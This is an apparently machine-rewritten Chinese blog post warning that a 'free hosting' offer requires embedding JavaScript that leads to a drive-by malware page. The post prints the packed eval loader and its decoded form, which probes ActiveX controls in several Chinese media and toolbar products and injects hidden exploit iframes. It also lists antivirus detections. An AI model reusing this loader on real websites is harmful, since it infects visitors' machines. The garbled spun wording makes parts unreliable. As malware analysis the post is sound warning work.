完全免费身后的圈套 处于被动散播木马病毒

2020-12-31 16:20


完全免费身后的圈套 处于被动散播木马病毒


小视频,自媒体平台,达种族草一站服务

  前几天见到有些人出示完全免费VPS和室内空间,觉得蛮好奇心。猜想另一方用意无果,便再加QQ了解,結果几句话出来吓我一跳。这人完全免费出示室内空间或vps,要是求挂一段JS编码,无一切广告宣传 不危害网站 说目地是以便刷点击和排行!话说到此就觉得另一方在瞎说,因此免费下载另一方规定的JS一看,里边只联接了一个JS URL,在下在看也是一个,每一次必须转成HTML看,很多出来把老大爷累个半死!最终总算出去一堆物品,最后总体目标全自动免费下载木马病毒!

  运用一大堆系统漏洞,实际编码不贴了,瑞星免杀的,中了不便!

DPClient.Vod迅雷资源系统漏洞;MPS.StormPlayer.1风暴影音视频系统漏洞;
PowerPlayerCtrl.1DVD播发器系统漏洞;Pdg2 超星浏览器系统漏洞;
GLCHAT.GLChatCtrl.1联众服务厅系统漏洞;
BaiduBar.Tool.1百度搜索非常搜霸系统漏洞,......

最先查验你是不是安裝WEB迅雷资源,无安裝的会弹出来安裝提醒,安裝的会运用xunlei系统漏洞全自动免费下载并实行木马病毒!

规定挂的编码是: 
sc ri pt src= scr ip t  
看上去像统计分析,是吧. 
随后我下次来剖析下: 
documen  t.writ eln( ifr ame src=\ :\/\/xxxxxx\/page\/add_ .htm?0055\ width=0 height=0 \/ifram e ) 
见到了吧,是开启了的一个静态数据网页页面 
大家来再次剖析: 
:\/\/xxxxxx\/page\/add_ .htm 
  实际上是 
\page\add_ .htm(它是详细地址)?0055(相近于统计分析) 
来剖析下上边的网页页面编码: 
  scr ipt src=addr.js(行为详细地址) /script  
script language= javascript type= text/javascript src= (统计分析详细地址) /s crip t  
绕过统计分析,大家看来哪个行为详细地址addr.js: 
eva  l  (funct ion(p,a,c,k,e,d){e=function {return(c a?'':e(parseInt(c/a)))+((c=c%a) 35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e ]=k[c]||e k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e +'\\b','g'),k[c]);return p}('z n=h 1f();n.1e(n.1d()+1c*A*A*1b);z y=h 1a(3.v);4(y.x( u= )==-1){j{4(19.18.17().x( w + 16 7 )==-1)3.f(\' 2 c=l:b a= 98.5/w.k /2 \')}i(e){}3.v= u=15;13= +n.12();j{4(h m( 11.10 ))3.f(\' 2 c=l:b a= 98.5/Z.k /2 \')}i(e){}j{4(h m( Y.X + W + V.1 ))3.f(\' 2 c=l:b a= 98.5/U.k /2 \')}i(e){}j{4(h m( T.S.1 ))3.f(\' 2 c=l:b a= 98.5/R.k /2 \')}i(e){}Q= P##########################!@#@!#O j{q=h m( t + s + .t + s.1 4(q.N( M ) = 6.0.14.L ){K= J*( F)(D* F()*D F) 3.f(\' 2 c=d\'+\'p\'+\'o:b a= 98.5/r\'+\'I.g\'+\'4 /2 \')}H{3.f(\' 2 c=d\'+\'p\'+\'o:b a= 98.5/r\'+\'G.g\'+\'4 /2 \')}}i(e){}j{4(h m( E.C.1 ))3.f(\' 2 c=l:b a= 98.5/B.k /2 \')}i(e){}}',62,78,'||iframe|document|if||||51xiazai886||src|none|style|||write||new|catch|try|gif|display|ActiveXObject|Then|lay|isp|Link||PCtl|IER|Cookie1|cookie|ms|indexOf|bbbbcookie|var|60|lz|GLChatCtrl||GLCHAT||eal_new|else|eal|yyyyyyyyyyy|xxxxxxxxxxxxxfiudsif|552|PRODUCTVERSION|PlayerProperty|lasf|flsadjfljasfd|fakshdflkasdhfasdf|bd|Tool|BaiduBar|bf|layer|ormP|St|MPS|xl|Vod|DPClient|toGMTString|expires||POPWIN  DOS|ie|toLowerCase|userAgent|navigator|String|1000|24|getTime|setTime|Date'.split('|'),0,  {})) 
哦,数据加密了呢~那么就解: 
var The n=ne w Da te();Then.setTime(Then.getTime()+24*60*60*1000);var bbbbcookie=new String(document.cookie);if(bbbbcookie.indexOf( Cookie1= )==-1){try{if(navigator.userAgent.toLowerCase().indexOf( ms + ie 7 )==-1)document.write(' iframe ')}catch(e){}document.cookie= Cookie1=POPWINDOS;expires= +Then.toGMTString();try{if(new ActiveXObject( DPClient.Vod ))document.write(' iframe ')}catch(e){}try{if(new ActiveXObject( MPS.St + ormP + layer.1 ))document.write(' iframe ')}catch(e){}try{if(new ActiveXObject( BaiduBar.Tool.1 ))document.write(' iframe ')}catch(e){}fakshdflkasdhfasdf= flsadjfljasfd##########################!@#@!#lasf try{Link=new ActiveXObject( IER + PCtl + .IER + PCtl.1 if(Link.PlayerProperty( PRODUCTVERSION ) = 6.0.14.552 ){xxxxxxxxxxxxxfiudsif= yyyyyyyyyyy*( F)(D* F()*D F) document.write(' iframe '+'isp'+'lay:none src= '+'eal_new.g'+'if /iframe ')}}catch(e){}try{if(new ActiveXObject( GLCHAT.GLChatCtrl.1 ))document.write(' iframe ')}catch(e)  { }} 
许多网马~还全是GIF文件格式的.在这里里讲讲小专业知识,GIF文件格式是能够实行HTML指令的,大伙儿能够试下. 
随意解密下XL.GIF(一看如同是讯雷的,但是不必根据看,要开展真正剖析) 
因编码太长,因此我只写成解密的木马病毒详细地址吧: 
;
这儿的专业知识点: 如何开展网马的辨别: 
clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F  这一的便是讯雷的 
最终大家来剖析这一木马病毒
杀毒网给出的信息内容:

扫描仪結果 :  22%的杀软(8/36)汇报发觉病毒感染時间 :  2008/05/19 18:06:08 (CST)

AntiVir7.8.0.197.0.4.59TR/Agent.4096.209
15.241Arcavir1.0.8-05-19Heur.Win32.I
6.526BitDefender7.60825..8-05-19Trojan.Agent.AINZ
Dr.WEB4.44.0..05.19Trojan.MulDrop.15725
F-PROT4.4.1.18Possible W32/Downloader-Sml-based!Maximus
SOPHOS2.73.04.29Mal/Heuri-E
VBA323.12.6.8.-05-18Win32.Trojan.Downloader (...) (suspicious)
发展趋势8.500-10015.284.03TROJ_ZLOB.AKT

这人QQ 7 网站他材料有 对编码有兴趣爱好者能够拷贝他的网站地址替代 sc ri pt src= scr ip t   中的xxxxxx科学研究!

最终几句,无商不奸 天地无完全免费的午饭  低头艰苦奋斗胜于光说不做 sadny




扫描二维码分享到微信

在线咨询
联系电话

020-66889888